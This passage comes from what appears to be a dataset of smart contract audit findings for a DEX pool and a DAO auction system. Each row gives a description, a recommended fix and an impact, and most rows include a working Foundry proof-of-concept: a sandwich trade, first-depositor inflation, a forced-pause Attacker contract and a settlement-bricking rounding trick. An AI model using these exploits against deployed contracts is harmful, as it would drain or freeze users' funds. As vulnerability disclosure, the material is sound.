fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. 
Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n\\nTest result and logs:\\nAfter the sandwich, we can see that the MEV bot's DAI amount exceeds its initial DAI balance (profits). Additionally, the reserves for both base and quote tokens are less than the initial 10 tokens deposited by the tapir (only LP). The profit gained by the MEV bot essentially translates to a loss for the tapir.\\nAnother note on this is that even though the `adjustPrice` called by MAINTAINER without getting frontrunned, it still creates a big price difference which requires immediate arbitrages. Usually these type of parameter changes that impacts the trades are setted by time via ramping to mitigate the unfair advantages that it can occur during the price update.","Acknowledge the issue and use private RPC's to eliminate front-running or slowly ramp up the ""I"" so that the arbitrage opportunity is fair",,"```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log(""Base target initial"", gsp._BASE_TARGET_());\\n console.log(""Quote target initial"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve initial"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve initial"", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 
receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n console.log(""Received base tokens"", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n" +First depositor can lock the quote target value to zero,medium,"When the initial deposit occurs, it is possible for the quote target to be set to 0. This situation significantly impacts other LPs as well. Even if subsequent LPs deposit substantial amounts, the quote target remains at 0 due to multiplication with this zero value. 0 QUOTE_TARGET value will impact the swaps that pool facilities\\nWhen the first deposit happens, QUOTE_TARGET is set as follows:\\n```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? 
DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n\\nIn this scenario, the 'shares' value can be a minimum of 1e3, as indicated here: link to code snippet.\\nThis implies that if someone deposits minuscule amounts of quote token and base token, they can set the QUOTE_TARGET to zero because the `mulFloor` operation uses a scaling factor of 1e18:\\n```\\nfunction mulFloor(uint256 target, uint256 d) internal pure returns (uint256) {\\n return target * d / (10 ** 18);\\n }\\n```\\n\\n```\\n// @review 0 + (0 * something) = 0! doesn't matter what amount has been deposited !\\n_QUOTE_TARGET_ = uint112(uint256(_QUOTE_TARGET_) + (DecimalMath.mulFloor(uint256(_QUOTE_TARGET_), mintRatio)));\\n```\\n\\nHere a PoC shows that if the first deposit is tiny the QUOTE_TARGET is 0. Also, whatever deposits after goes through the QUOTE_TARGET still 0 because of the multiplication with 0!\\n```\\nfunction test_StartWithZeroTarget() external {\\n // tapir deposits tiny amounts to make quote target 0\\n vm.startPrank(tapir);\\n dai.safeTransfer(address(gsp), 1 * 1e5);\\n usdc.transfer(address(gsp), 1 * 1e5);\\n gsp.buyShares(tapir);\\n\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n\\n // quote target is indeed 0!\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n\\n vm.stopPrank();\\n\\n // hippo deposits properly\\n vm.startPrank(hippo);\\n dai.safeTransfer(address(gsp), 1000 * 1e18);\\n usdc.transfer(address(gsp), 10000 * 1e6);\\n gsp.buyShares(hippo);\\n\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", 
gsp._QUOTE_RESERVE_());\\n\\n // although hippo deposited 1000 USDC as quote tokens, target is still 0 due to multiplication with 0\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n }\\n```\\n\\nTest result and logs:","According to the quote tokens decimals, multiply the quote token balance with the proper decimal scalor.",Since the quote target is important and used when pool deciding the swap math I will label this as high.,"```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n" +"Share Price Inflation by First LP-er, Enabling DOS Attacks on Subsequent buyShares with Up to 1001x the Attacking Cost",medium,"The smart contract contains a critical vulnerability that allows a malicious actor to manipulate the share price during the initialization of the liquidity pool, potentially leading to a DOS attack on subsequent buyShares operations.\\nThe root cause of the vulnerability lies in the initialization process of the liquidity pool, specifically in the calculation of shares during the first deposit.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? 
DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n\\nIf the pool is empty, the smart contract directly sets the share value based on the minimium value of the base token denominated value of the provided assets. This assumption can be manipulated by a malicious actor during the first deposit, leading to a situation where the LP pool token becomes extremely expensive.\\nAttack Scenario\\nThe attacker exploits the vulnerability during the initialization of the liquidity pool:\\nThe attacker mints 1001 `shares` during the first deposit.\\nImmediately, the attacker sells back 1000 `shares`, ensuring to keep 1 wei via the `sellShares` function.\\nThe attacker then donates a large amount (1000e18) of base and quote tokens and invokes the `sync()` routine to pump the base and quote reserves to 1001 + 1000e18.\\nThe protocol users proceed to execute the `buyShares` function with a balance less than `attacker's spending * 1001`. The transaction reverts due to the `mintRatio` being kept below 1001 wad and the computed `shares` less than 1001 (line 71), while it needs a value >= 1001 to mint `shares` successfully.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 2. normal case\\n uint256 baseInputRatio = DecimalMath.divFloor(baseInput, baseReserve);\\n uint256 quoteInputRatio = DecimalMath.divFloor(quoteInput, quoteReserve);\\n uint256 mintRatio = quoteInputRatio < baseInputRatio ? 
quoteInputRatio : baseInputRatio; // <= FOUND: mintRatio below 1001wad if input amount smaller than reserves * 1001\\n // The shares will be minted to user\\n shares = DecimalMath.mulFloor(totalSupply, mintRatio); // <= FOUND: the manipulated totalSupply of 1wei requires a mintRatio of greater than 1000 for a successful _mint()\\n // rest of code\\n }\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPVault.sol\\n function _mint(address user, uint256 value) internal {\\n require(value > 1000, ""MINT_AMOUNT_NOT_ENOUGH""); // <= FOUND: next buyShares with volume less than 1001 x attacker balance will revert here\\n// rest of code\\n }\\n```\\n\\nThe `_mint()` function fails with a ""MINT_AMOUNT_NOT_ENOUGH"" error, causing a denial-of-service condition for subsequent buyShares operations.\\nPOC\\n```\\n// File: dodo-gassaving-pool/test/GPSTrader.t.sol\\n function test_mint1weiShares_DOSx1000DonationVolume() public {\\n GSP gspTest = new GSP();\\n gspTest.init(\\n MAINTAINER,\\n address(mockBaseToken),\\n address(mockQuoteToken),\\n 0,\\n 0,\\n 1000000,\\n 500000000000000,\\n false\\n );\\n\\n // Buy 1001 shares\\n vm.startPrank(USER);\\n mockBaseToken.transfer(address(gspTest), 1001);\\n mockQuoteToken.transfer(address(gspTest), 1001 * gspTest._I_() / 1e18);\\n gspTest.buyShares(USER);\\n assertEq(gspTest.balanceOf(USER), 1001);\\n\\n // User sells shares and keep ONLY 1wei\\n gspTest.sellShares(1000, USER, 0, 0, """", block.timestamp);\\n assertEq(gspTest.balanceOf(USER), 1);\\n\\n // User donate a huge amount of base & quote tokens to inflate the share price\\n uint256 donationAmount = 1000e18;\\n mockBaseToken.transfer(address(gspTest), donationAmount);\\n mockQuoteToken.transfer(address(gspTest), donationAmount * gspTest._I_() / 1e18);\\n gspTest.sync();\\n vm.stopPrank();\\n\\n // DOS subsequent operations with roughly 1001 x donation volume\\n uint256 dosAmount = donationAmount * 1001;\\n mockBaseToken.mint(OTHER, type(uint256).max);\\n 
mockQuoteToken.mint(OTHER, type(uint256).max);\\n\\n vm.startPrank(OTHER);\\n mockBaseToken.transfer(address(gspTest), dosAmount);\\n mockQuoteToken.transfer(address(gspTest), dosAmount * gspTest._I_() / 1e18);\\n\\n vm.expectRevert(""MINT_AMOUNT_NOT_ENOUGH"");\\n gspTest.buyShares(OTHER);\\n vm.stopPrank();\\n }\\n```\\n\\nA PASS result would confirm that any deposits with volume less than 1001 times to attacker cost would fail. That means by spending $1000, the attacker can DOS any transaction with volume below $1001,000.","A mechanism should be implemented to handle the case of zero totalSupply during initialization. A potential solution is inspired by Uniswap V2 Core Code, which sends the first 1001 LP tokens to the zero address. This way, it's extremely costly to inflate the share price as much as 1001 times on the first deposit.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; \\n+ _mint(address(0), 1001); // permanently lock the first MINIMUM_LIQUIDITY of 1001 tokens, makes it imposible to manipulate the totalSupply to 1 wei\\n// rest of code\\n``` // rest of code\\n```\\n","The impact of this vulnerability is severe, as it allows an attacker to conduct DOS attacks on buyShares with a low attacking cost (retrievable for further attacks via sellShares). 
This significantly impairs the core functionality of the protocol, potentially preventing further LP operations and hindering the protocol's ability to attract Total Value Locked (TVL) for other trading operations such as sellBase, sellQuote and flashloan.","```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n" +Attacker can force pause the Auction contract.,medium,"In certain situations (e.g founders have ownership percentage greater than 51) an attacker can potentially exploit the `try catch` within the `Auction._CreateAuction()` function to arbitrarily pause the auction contract.\\nConsider the code from `Auction._CreateAuction()` function, which is called by `Auction.settleCurrentAndCreateNewAuction()`. 
It first tries to mint a new token for the auction, and if the minting fails the `catch` branch will be triggered, pausing the auction.\\n```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n\\nDue to the internal logic of the `mint` function, if there are founders with high ownership percentages, many tokens can be minted to them during calls to mintas part of the vesting mechanism. As a consequence of this under some circumstances calls to `mint` can consume huge amounts of gas.\\nCurrently on Ethereum and EVM-compatible chains, calls can consume at most 63/64 of the parent's call gas (See EIP-150). An attacker can exploit this circumstances of high gas cost to restrict the parent gas call limit, making `token.mint()` fail and still leaving enough gas left (1/64) for the `_pause()` call to succeed. 
Therefore he is able to force the pausing of the auction contract at will.\\nBased on the gas requirements (1/64 of the gas calls has to be enough for `_pause()` gas cost of 21572), then `token.mint()` will need to consume at least 1359036 gas (63 * 21572), consequently it is only possible on some situations like founders with high percentage of vesting, for example 51 or more.\\nConsider the following POC. Here we are using another contract to restrict the gas limit of the call, but this can also be done with an EOA call from the attacker.\\nExploit contract code:\\n```\\npragma solidity ^0.8.16;\\n\\ncontract Attacker {\\n function forcePause(address target) external {\\n bytes4 selector = bytes4(keccak256(""settleCurrentAndCreateNewAuction()""));\\n assembly {\\n let ptr := mload(0x40)\\n mstore(ptr,selector)\\n let success := call(1500000, target, 0, ptr, 4, 0, 0)\\n }\\n }\\n}\\n```\\n\\nPOC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.16;\\n\\nimport { NounsBuilderTest } from ""./utils/NounsBuilderTest.sol"";\\nimport { MockERC721 } from ""./utils/mocks/MockERC721.sol"";\\nimport { MockImpl } from ""./utils/mocks/MockImpl.sol"";\\nimport { MockPartialTokenImpl } from ""./utils/mocks/MockPartialTokenImpl.sol"";\\nimport { MockProtocolRewards } from ""./utils/mocks/MockProtocolRewards.sol"";\\nimport { Auction } from ""../src/auction/Auction.sol"";\\nimport { IAuction } from ""../src/auction/IAuction.sol"";\\nimport { AuctionTypesV2 } from ""../src/auction/types/AuctionTypesV2.sol"";\\nimport { TokenTypesV2 } from ""../src/token/types/TokenTypesV2.sol"";\\nimport { Attacker } from ""./Attacker.sol"";\\n\\ncontract AuctionTest is NounsBuilderTest {\\n MockImpl internal mockImpl;\\n Auction internal rewardImpl;\\n Attacker internal attacker;\\n address internal bidder1;\\n address internal bidder2;\\n address internal referral;\\n uint16 internal builderRewardBPS = 300;\\n uint16 internal referralRewardBPS = 400;\\n\\n function setUp() public 
virtual override {\\n super.setUp();\\n bidder1 = vm.addr(0xB1);\\n bidder2 = vm.addr(0xB2);\\n vm.deal(bidder1, 100 ether);\\n vm.deal(bidder2, 100 ether);\\n mockImpl = new MockImpl();\\n rewardImpl = new Auction(address(manager), address(rewards), weth, builderRewardBPS, referralRewardBPS);\\n attacker = new Attacker();\\n }\\n\\n function test_POC() public {\\n // START OF SETUP\\n address[] memory wallets = new address[](1);\\n uint256[] memory percents = new uint256[](1);\\n uint256[] memory vestingEnds = new uint256[](1);\\n wallets[0] = founder;\\n percents[0] = 99;\\n vestingEnds[0] = 4 weeks;\\n //Setting founder with high percentage ownership.\\n setFounderParams(wallets, percents, vestingEnds);\\n setMockTokenParams();\\n setMockAuctionParams();\\n setMockGovParams();\\n deploy(foundersArr, tokenParams, auctionParams, govParams);\\n setMockMetadata();\\n // END OF SETUP\\n\\n // Start auction contract and do the first auction\\n vm.prank(founder);\\n auction.unpause();\\n vm.prank(bidder1);\\n auction.createBid{ value: 0.420 ether }(99);\\n vm.prank(bidder2);\\n auction.createBid{ value: 1 ether }(99);\\n\\n // Move block.timestamp so auction can end.\\n vm.warp(10 minutes + 1 seconds);\\n\\n //Attacker calls the auction\\n attacker.forcePause(address(auction));\\n\\n //Check that auction was paused.\\n assertEq(auction.paused(), true);\\n }\\n}\\n```\\n","Consider better handling the possible errors from `Token.mint()`, like shown below:\\n```\\n function _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n //CODE OMMITED\\n } catch (bytes memory err) {\\n // On production consider pre-calculating the hash values to save gas\\n if (keccak256(abi.encodeWithSignature(""NO_METADATA_GENERATED()"")) == keccak256(err)) {\\n _pause();\\n return false\\n } else if (keccak256(abi.encodeWithSignature(""ALREADY_MINTED()"") == keccak256(err)) {\\n _pause();\\n return false\\n } 
else {\\n revert OUT_OF_GAS();\\n }\\n } \\n```\\n","Should the conditions mentioned above be met, an attacker can arbitrarily pause the auction contract, effectively interrupting the DAO auction process. This pause persists until owners takes subsequent actions to unpause the contract. The attacker can exploit this vulnerability repeatedly.","```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n" +MerkleReserveMinter minting methodology is incompatible with current governance structure and can lead to migrated DAOs being hijacked immediately,medium,"MerkleReserveMinter allows large number of tokens to be minted instantaneously which is incompatible with the current governance structure which relies on tokens being minted individually and time locked after minting by the auction. By minting and creating a proposal in the same block a user is able to create a proposal with significantly lower quorum than expected. 
This could easily be used to hijack the migrated DAO.\\nMerkleReserveMinter.sol#L154-L167\\n```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n\\nWhen minting from the claim merkle tree, a user is able to mint as many tokens as they want in a single transaction. This means in a single transaction, the supply of the token can increase very dramatically. Now we'll take a look at the governor contract as to why this is such an issue.\\nGovernor.sol#L184-L192\\n```\\n // Store the proposal data\\n proposal.voteStart = SafeCast.toUint32(snapshot);\\n proposal.voteEnd = SafeCast.toUint32(deadline);\\n proposal.proposalThreshold = SafeCast.toUint32(currentProposalThreshold);\\n proposal.quorumVotes = SafeCast.toUint32(quorum());\\n proposal.proposer = msg.sender;\\n proposal.timeCreated = SafeCast.toUint32(block.timestamp);\\n\\n emit ProposalCreated(proposalId, _targets, _values, _calldatas, _description, descriptionHash, proposal);\\n```\\n\\nGovernor.sol#L495-L499\\n```\\nfunction quorum() public view returns (uint256) {\\n unchecked {\\n return (settings.token.totalSupply() * settings.quorumThresholdBps) / BPS_PER_100_PERCENT;\\n }\\n}\\n```\\n\\nWhen creating a proposal, we see that it uses a snapshot of the CURRENT total supply. This is what leads to the issue. 
The setup is fairly straightforward and occurs all in a single transaction:\nCreate a malicious proposal (which snapshots current supply)\nMint all the tokens\nVote on malicious proposal with all minted tokens\nThe reason this works is because the quorum is based on the supply before the mint while votes are considered after the mint, allowing significant manipulation of the quorum.","Token should be changed to use a checkpoint based total supply, similar to how balances are handled. Quorum should be based on that instead of the current supply.",DAO can be completely hijacked,"```\nunchecked {\n    for (uint256 i = 0; i < claimCount; ++i) {\n        // Load claim in memory\n        MerkleClaim memory claim = claims[I];\n\n        // Requires one proof per tokenId to handle cases where users want to partially claim\n        if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\n            revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\n        }\n\n        // Only allowing reserved tokens to be minted for this strategy\n        IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\n    }\n}\n```\n" +when reservedUntilTokenId > 100 first funder loss 1% NFT,high,"The incorrect use of `baseTokenId = reservedUntilTokenId` may result in the first `tokenRecipient[]` being invalid, thus preventing the founder from obtaining this portion of the NFT.\nThe current protocol adds a parameter `reservedUntilTokenId` for reserving `Token`. 
This parameter will be used as the starting `baseTokenId` during initialization.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n\\nBecause `baseTokenId = reservedUntilTokenId` is used, if `reservedUntilTokenId>100`, for example, reservedUntilTokenId=200, the first `_getNextTokenId(200)` will return `baseTokenId=200 , tokenRecipient[200]=newFounder`.\\nExample: reservedUntilTokenId = 200 founder[0].founderPct = 10\\nIn this way, the `tokenRecipient[]` of `founder` will become tokenRecipient[200].wallet = `founder` ( first will call _getNextTokenId(200) return 200) tokenRecipient[10].wallet = `founder` ( second will call _getNextTokenId((200 + 10) %100 = 10) ) tokenRecipient[20].wallet = `founder` ... tokenRecipient[90].wallet = `founder`\\nHowever, this `tokenRecipient[200]` will never be used, because in `_isForFounder()`, it will be modulo, so only `baseTokenId < 100` is valid. 
In this way, the first founder can actually only `9%` of NFT.\\n```\\n function _isForFounder(uint256 _tokenId) private returns (bool) {\\n // Get the base token id\\n uint256 baseTokenId = _tokenId % 100;\\n\\n // If there is no scheduled recipient:\\n if (tokenRecipient[baseTokenId].wallet == address(0)) {\\n return false;\\n\\n // Else if the founder is still vesting:\\n } else if (block.timestamp < tokenRecipient[baseTokenId].vestExpiry) {\\n // Mint the token to the founder\\n _mint(tokenRecipient[baseTokenId].wallet, _tokenId);\\n\\n return true;\\n\\n // Else the founder has finished vesting:\\n } else {\\n // Remove them from future lookups\\n delete tokenRecipient[baseTokenId];\\n\\n return false;\\n }\\n }\\n```\\n\\nPOC\\nThe following test demonstrates that `tokenRecipient[200]` is for founder.\\nneed change tokenRecipient to public , so can assertEq\\n```\\ncontract TokenStorageV1 is TokenTypesV1 {\\n /// @notice The token settings\\n Settings internal settings;\\n\\n /// @notice The vesting details of a founder\\n /// @dev Founder id => Founder\\n mapping(uint256 => Founder) internal founder;\\n\\n /// @notice The recipient of a token\\n /// @dev ERC// Remove the line below\\n721 token id => Founder\\n// Remove the line below\\n mapping(uint256 => Founder) internal tokenRecipient;\\n// Add the line below\\n mapping(uint256 => Founder) public tokenRecipient;\\n}\\n```\\n\\nadd to `token.t.sol`\\n```\\n function test_lossFirst(address _minter, uint256 _reservedUntilTokenId, uint256 _tokenId) public {\\n deployAltMock(200);\\n (address wallet ,,)= token.tokenRecipient(200);\\n assertEq(wallet,founder);\\n }\\n```\\n\\n```\\n$ forge test -vvv --match-test test_lossFirst\\n\\nRunning 1 test for test/Token.t.sol:TokenTest\\n[PASS] test_lossFirst(address,uint256,uint256) (runs: 256, μ: 3221578, ~: 3221578)\\nTest result: ok. 
1 passed; 0 failed; 0 skipped; finished in 355.45ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n","A better is that the baseTokenId always starts from 0.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId =0;\\n```\\n\\nor\\nuse `uint256 baseTokenId = reservedUntilTokenId % 100;`\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId = reservedUntilTokenId % 100;\\n```\\n",when reservedUntilTokenId > 100 first funder loss 1% NFT,"```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n" +Adversary can permanently brick auctions due to precision error in 
Auction#_computeTotalRewards,high,"When batch depositing to ProtocolRewards, the msg.value is expected to match the sum of the amounts array EXACTLY. The issue is that due to precision loss in Auction#_computeTotalRewards this call can be engineered to always revert which completely bricks the auction process.\\nProtocolRewards.sol#L55-L65\\n```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n\\nWhen making a batch deposit the above method is called. As seen, the call with revert if the sum of amounts does not EXACTLY equal the msg.value.\\nAuction.sol#L474-L507\\n```\\n uint256 totalBPS = _founderRewardBps + referralRewardsBPS + builderRewardsBPS;\\n\\n // rest of code\\n\\n // Calulate total rewards\\n split.totalRewards = (_finalBidAmount * totalBPS) / BPS_PER_100_PERCENT;\\n\\n // rest of code\\n\\n // Initialize arrays\\n split.recipients = new address[](arraySize);\\n split.amounts = new uint256[](arraySize);\\n split.reasons = new bytes4[](arraySize);\\n\\n // Set builder reward\\n split.recipients[0] = builderRecipient;\\n split.amounts[0] = (_finalBidAmount * builderRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set referral reward\\n split.recipients[1] = _currentBidRefferal != address(0) ? _currentBidRefferal : builderRecipient;\\n split.amounts[1] = (_finalBidAmount * referralRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set founder reward if enabled\\n if (hasFounderReward) {\\n split.recipients[2] = founderReward.recipient;\\n split.amounts[2] = (_finalBidAmount * _founderRewardBps) / BPS_PER_100_PERCENT;\\n }\\n```\\n\\nThe sum of the percentages are used to determine the totalRewards. Meanwhile, the amounts are determined using the broken out percentages of each. 
This leads to unequal precision loss, which can cause totalRewards to be off by a single wei which cause the batch deposit to revert and the auction to be bricked. Take the following example:\\nAssume a referral reward of 5% (500) and a builder reward of 5% (500) for a total of 10% (1000). To brick the contract the adversary can engineer their bid with specific final digits. In this example, take a bid ending in 19.\\n```\\nsplit.totalRewards = (19 * 1,000) / 100,000 = 190,000 / 100,000 = 1\\n\\nsplit.amounts[0] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\nsplit.amounts[1] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\n```\\n\\nHere we can see that the sum of amounts is not equal to totalRewards and the batch deposit will revert.\\nAuction.sol#L270-L273\\n```\\nif (split.totalRewards != 0) {\\n // Deposit rewards\\n rewardsManager.depositBatch{ value: split.totalRewards }(split.recipients, split.amounts, split.reasons, """");\\n}\\n```\\n\\nThe depositBatch call is placed in the very important _settleAuction function. This results in auctions that are permanently broken and can never be settled.","Instead of setting totalRewards with the sum of the percentages, increment it by each fee calculated. 
